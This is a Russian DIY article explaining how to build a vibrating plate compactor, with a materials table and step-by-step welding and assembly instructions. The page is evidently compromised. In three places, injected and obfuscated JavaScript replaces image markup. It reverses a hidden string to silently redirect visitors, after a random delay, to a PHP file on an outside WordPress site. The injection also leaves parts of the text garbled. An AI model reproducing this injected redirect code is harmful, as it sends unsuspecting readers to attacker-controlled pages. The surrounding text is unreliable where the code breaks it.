Добавить в закладки

Виброплита своими руками — выбор материалов и поэтапная инструкция сборки

$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tolko-pri-rabo-600×433.png» alt=»Применение вибромашины актуально не только при работе с песчаными грунтами, но и при уплотнении щебня» width=»600″ height=»433″ /> Применение вибромашины актуально не только при работе с песчаными грунтами, но и при уплотнении щебня

Хотите узнать, как собирается виброплита своими руками? Я расскажу, какие нужны материалы и инструменты и дам пошаговую инструкцию сборки. А также объясню ее принцип действия и познакомлю с разновидностями данного оборудования.

Как это работает

$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}ton-600×338.jpg» alt=»Уплотнение песчаной подсыпки перед заливкой бетонной стяжки» width=»600″ height=»338″ /> Уплотнение песчаной подсыпки перед заливкой бетонной стяжки

Принцип работы виброплиты основан на вращении эксцентрика, который за каждый оборот смещенного маховика создает колебание:

  • Привод, за счёт смещенного груза на вале создаёт вибрацию, которая передаётся металлической плите — подошве;
  • Чем тяжелее плита в основании агрегата и чем сильнее вибрация, тем эффективнее уплотнение.

По схожему принципу работает виброплощадка , с помощью которой производятся прессованные блоки из шлакобетонов. Только в этом случае, двигатель с эксцентриком располагается не над рабочей поверхностью, а под ней.

Тип привода

Современные виброплиты оснащаются двумя типами приводов:

$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tobloka-so-starogo-ag-600×426.jpg» alt=»Самодельная виброплита из мотоблока — со старого агрегата взят двигатель и рама, на которой он закреплен» width=»600″ height=»426″ /> Самодельная виброплита из мотоблока — со старого агрегата взят двигатель и рама, на которой он закреплен

  1. Бензиновые или дизельные двигатели. Двигатели внутреннего сгорания используются на тяжёлых и массивных установках весом более 200 кг. Из-за выхлопных газов, дизельная или бензиновая виброплита рекомендована для применения на открытых участках.
Так выглядит компактная виброплита электрическая, полностью сделанная своими руками

Так выглядит компактная виброплита электрическая, полностью сделанная своими руками

  1. Электродвигатели. Виброплиты на электромоторе более компактные в сравнении с бензиновыми аналогами:
    • Преимущество электротрамбовок — универсальность применения, ведь их можно использовать не только на открытом участке, но и внутри закрытого объекта;
    • Недостаток электрического оборудования — зависимость от питания, то есть, объект должен быть электрифицирован или на объекте должен использоваться генератор.
Подобные чертежи можно применить при переделке мотоблока в трамбовку

Подобные чертежи можно применить при переделке мотоблока в трамбовку

Независимо от типа привода, ресурс вибратора редко превышает 1000 часов. Вибрация от смещенного маховика на вале воздействует не только на плиту, но и на подшипники в ступице вала.

Износ подшипников приводит к заклиниванию вала. Поэтому, по истечении заявленного ресурса, подшипники подлежат обязательной замене, даже если они внешне выглядят целыми.

Что можно сделать самому

Внешний вид самодельной виброплиты после окончательной сборки и покраски – как собрать такой агрегат, читайте дальше

Внешний вид самодельной виброплиты после окончательной сборки и покраски – как собрать такой агрегат, читайте дальше

Рассмотрим, какова инструкция изготовления виброплиты для укладки тротуарной плитки. Цена фабричного оборудования с аналогичными характеристиками начинается от 50 тыс. рублей. Поэтому уверен, что предположенная дальше инструкция будет интересна многим.

Для уплотнения песчаной подсыпки на глубину не менее 20 см, готовый агрегат должен весить не менее 80 кг. Если вес конструкции будет меньше, трамбовку будет трудно удержать, но требуемого действия на грунт она не окажет.

Для транспортировки оборудования с весом 80 и более кг можно будет приспособить автомобильный прицеп.

Материалы и инструменты

Для изготовления трамбовки потребуется сварочный аппарат, болгарка с отрезными дисками по металлу, дрель с набором сверл, струбцины, кувалда, измерительный инструмент. Перечень материалов и комплектующих приведен в следующей таблице:

Материалы и комплектующие Описание
table_pic_1 Электродвигатель. Рекомендованная мощность двигателя должна составлять 1,5-2 кВт при 4000-5000 оборотов. Моторы с меньшей мощностью не обеспечат нужной скорости вращения вала, а значит, вибрационное усилие будет недостаточно интенсивным.
table_pic_2 Устройство защитного отключения (УЗО). При длительной работе самодельной трамбовки, отдельные части электрической схемы могут перегреваться.

Чтобы исключить сгорание обмотки или плавление изоляции, нужно установить УЗО или хотя бы обычный сетевой прерыватель (автомат).

table_pic_3 Листовая сталь с толщиной 5 мм, 8 мм и 10 мм. Листовой металл с самой большой толщиной понадобится, чтобы сделать подошву и груз для эксцентрика.

Металл меньшей tolshhina-peregorodki-iz-gipsokartona-623″>толщины потребуется для изготовления площадки под установку мотора.

table_pic_4 Съемные шкивы. Шкивы будут нужны для передачи крутящего момента с вала двигателя на вал вибратора.

Чтобы заставить вал вибратора крутиться быстро, шкив на двигателе должен иметь втрое больший диаметр, чем шкив на валу.

table_pic_5 Ремень, можно автомобильный ремень ГРМ. Ременная передача нужна для того, чтобы соединить шкивы на валах.
table_pic_6 Стальной уголок с шириной полок 5 и 10 см, и с толщиной металла 10 мм. Уголок нужен для того, чтобы усилить конструкцию трамбовки в тех местах, где нет возможности для этого применить tona-621″>профильную трубу.
table_pic_7 Стальная труба прямоугольная 50×20 мм. Металлическая труба пригодится для сборки моторной рамы и для сборки ручки, за которую всю конструкцию можно будет передвигать вперед и назад.
table_pic_8 Резьбовая шпилька с диаметром 20 мм и гайки под нее. Шпильки и гайки понадобятся для соединения конструктивных элементов.
table_pic_9 Закрытые подшипники. Для сборки ступицы вала понадобится два закрытых игольчатых подшипника. Если нет игольчатых подшипников, можно использовать шариковые, но они менее прочные.

Кроме того, понадобится труба с внутренним диаметром, равным внешнему диаметру подшипника.

table_pic_10 Цилиндрический стальной прут с диаметром не меньше 30 мм. Прут нужен для изготовления вала, на котором будет закреплен груз.

Сборка трамбовки

Обратите внимание на то, что в качестве привода будет использован электродвигатель. Но точно также, на собранную конструкцию может быть установлен двигатель внутреннего сгорания. Дело в том, что схема установки электродвигателей и двигателей внутреннего сгорания одинакова, так как мотор крепится к площадке несколькими болтами.

Иллюстрация Описание этапа
table_pic_11 Крепление балласта на валу. Для того чтобы аппарат вибрировал, к одной стороне вала приваривается пакет из трех — четырех металлических пластин.

Чтобы менять число пластин, можно высверлить в цилиндре вала сквозные отверстия. Такие же отверстия сверлятся в пластинах, которые крепятся к валу с помощью болтов и гаек.

table_pic_12 Заготовка деталей для крепления вала. Заготавливаются два куска угольника длиной по 10 см. и два кожуха ступиц на металлических пластинах. В эти кожухи ступиц потом впрессуем подшипники.
table_pic_13 Сборка виброузла. Из заготовленных деталей собираем виброузел, в котором зафиксированы подшипники с продетым в них валом. С торца на вал крепится шкив.
table_pic_14 Изготовление рамы и площадки для крепления мотора. Из профильной трубы сваривается рама с внешним периметром 40×60 см. Из стального листа толщиной 8 мм нарезается пластина 40×50 см.

На пластине, как показано на фото, вырезаются выемки под регулировочные болты и привариваются петли.

table_pic_15 Сборка петель. Напротив приваренных к пластине колец, к раме привариваем ответные кольца, так, чтобы их расположение полностью совпало.
table_pic_16 Сборка всего узла. Подготовленную раму и поворотную пластину соединяем шпилькой через петли. Учитывая то, что конструкция будет вибрировать, шпильку вставляем через резиновые втулки.

В противоположной стороне рамы приваривается вертикальная шпилька, которая должна проходить через прорези в наклонной пластине.

table_pic_17 Регулировка ремня. Для того чтобы задать подходящую степень натяжки ремня, с обеих сторон пластины, через шайбы, на вертикальную шпильку накручиваются гайки.

Потом, при усилении натяжки, пластина будет подниматься затяжкой гаек вверх.

table_pic_18 Монтаж стоек под раму. С каждого угла рамы приваривается по опоре длиной 10 см. Из листовой стали толщиной 8 мм вырезаются ответные опоры, которые будут крепиться к подошве виброплиты. Соединение опор будет выполняться через резиновые эластичные подушки.
table_pic_19 Сборка амортизирующих опор. Заготовленные опоры и ответные планки, через резиновые подушки, стягиваются болтами.

Итого должно получиться четыре амортизатора — по одному на каждый угол рамы.

table_pic_20 Установка двигателя и примерка виброузла.

  • На собранную раму с поворотной крышкой, болтами крепим двигатель с установленным шкивом;
  • Пропускаем через шкивы ремень и убеждаемся в том, что конструкция собрана правильно.
table_pic_21 Подготовка плиты под подошву. Лист стали толщиной 10 мм размечаем так, чтобы получился прямоугольник 40×120 см.

По сделанной разметке вырезается прямоугольник и крепится струбцинами к рабочей поверхности верстака.

table_pic_22 Обрезка углов. По углам подготовленной плиты отмеряем по 50 мм с каждого края и соединяем метки диагональной линией, чтобы получился треугольник с прямым углом.

Болгаркой обрезаем каждый из четырех углов на плите, как это показано на фото.

table_pic_23 Загиб переднего и заднего края плиты. От переднего и заднего края отмеряется 100 мм, и на этом расстоянии чертится линия, параллельная краю пластины.

По линии делается надрез глубиной примерно в 2/3 толщины листа.

По сделанному надрезу гнем лист кувалдой, чтобы получился край лыжи, как это показано на фото.

table_pic_24 Сборка всех элементов. Собранная ранее конструкция, включая крепёжные кронштейны и моторную раму, прихватывается на подошву сваркой. Заодно провариваются линии сгиба по переднему и заднему краю сгиба подошвы.

Кстати, сгибы нужны с обеих сторон для переднего и заднего хода машины.

table_pic_25 Сборка и монтаж рукояти. В задней части подошвы привариваются петли, к которым крепится рукоять, сваренная в форме буквы «П» из профильной трубы.
table_pic_26 Подключение и пробный запуск. Силовой кабель, через УЗО, подсоединяется к двигателю. Вибромашина включается в сеть и выполняется пробный запуск.

В завершение

Теперь вы знаете, как может быть собрана виброплита своими руками с бензиновым двигателем или с электрическим мотором. Также рекомендую посмотреть видео в этой статье, а если остались вопросы, задавайте их в комментариях.



Понравилась статья? Подписывайтесь на наш канал Яндекс.Дзен

Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail:
Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: Виктор
Опубликовано: 16.02.2017



Top